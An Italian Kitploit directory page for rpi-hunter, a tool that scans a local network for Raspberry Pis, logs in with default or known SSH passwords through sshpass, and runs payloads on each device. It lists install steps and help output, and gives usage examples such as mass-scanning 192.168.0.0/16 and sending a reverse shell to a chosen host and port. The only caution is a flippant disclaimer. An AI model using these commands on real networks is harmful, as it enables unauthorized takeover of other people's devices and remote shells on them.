Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
rpi-hunter — Auto-scoperta e sfruttamento di Raspberry Pi in LAN | Kitploit
Strumenti/GitHubGitHub/busescanfly/rpi-hunter
Generazione di PayloadExploitRaccolta InformazioniSicurezza di RetePenetration Testing
GitHubbusescanfly/rpi-hunter

rpi-hunter

Auto-scoperta e sfruttamento di Raspberry Pi in LAN

Vedi Repository
108162 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

rpi-hunter

  • Automatizza la scoperta e l'invio di payload su Raspberry Pi in LAN tramite ssh
  • Oppure, il titolo onesto: automatizzare sshpass per la consegna di comandi.

alt text

Rpi-hunter è utile quando ci sono più Raspberry Pi sulla tua LAN con credenziali predefinite o note, per automatizzare l'invio di comandi/payload.

GUIDA:

Installazione

  1. Installa le dipendenze: sudo pip install -U argparse termcolor e sudo apt -y install arp-scan tshark sshpass
  2. Scarica rpi-hunter: git clone https://github.com/BusesCanFly/rpi-hunter
  3. Spostati in rpi-hunter: cd ./rpi-hunter
  4. Rendi eseguibile rpi-hunter.py: chmod +x rpi-hunter.py
  • Variante in una riga: sudo pip install -U argparse termcolor && sudo apt -y install arp-scan tshark sshpass && git clone https://github.com/BusesCanFly/rpi-hunter && cd ./rpi-hunter && chmod +x rpi-hunter.py

Utilizzo

Dai un'occhiata a questo fantastico video e al relativo articolo realizzati dal team di NullByte!

  • Nota: Per i nuovi, ho apportato alcuni aggiornamenti a rpi-hunter per correggere bug e aggiungere nuove funzionalità :) Eseguendo il comando ./rpi-hunter.py verrà automaticamente scansionata l'intera rete locale e verrà eseguito il comando whoami su ogni Raspberry Pi trovato.
root@kitploit:~
usage: rpi-hunter.py [-h] [--list] [--no-scan] [-r IP_RANGE] [-f IP_LIST]
                     [-c CREDS] [--payload PAYLOAD] [-H HOST] [-P PORT]
                     [--safe] [-q]

optional arguments:
  -h, --help         show this help message and exit
  --list             List available payloads
  --no-scan          Disable ARP scanning
  -r IP_RANGE        IP range to scan
  -f IP_LIST         IP list to use (Default ./scan/RPI_list)
  -u UNAME           Username to use when ssh'ing
  -c CREDS           Password to use when ssh'ing
  --payload PAYLOAD  (Name of, or raw) Payload [ex. reverse_shell or 'whoami']
  -H HOST            (If using reverse_shell payload) Host for reverse shell
  -P PORT            (If using reverse_shell payload) Port for reverse shell
  --safe             Print sshpass command, but don't execute it
  -q                 Don't print banner
  • Esegui ./rpi-hunter.py --list per vedere i payload disponibili.

  • I payload possono essere specificati tramite il nome del payload da --list o come input raw

    • es. --payload reverse_shell o --payload [il tuo comando cli qui]
  • Esempi di utilizzo:

    • ./rpi-hunter.py -r 192.168.0.0/16 --payload reverse_shell -H 127.0.0.1 -P 1337
      • Nota: solo il payload "reverse_shell" richiede i flag -H e -P
    • ./rpi-hunter.py -c lamepassword --payload "ls -lah \~"
      • Nota: assicurati di escapare i caratteri speciali con un \

Dichiarazione di non responsabilità:

Si applica la solita clausola di esonero da responsabilità per divertimento su Internet. Non commettere reati, sii responsabile.

Non sono in alcun modo responsabile per qualsiasi cosa tu faccia con rpi-hunter.

Scarica lo strumento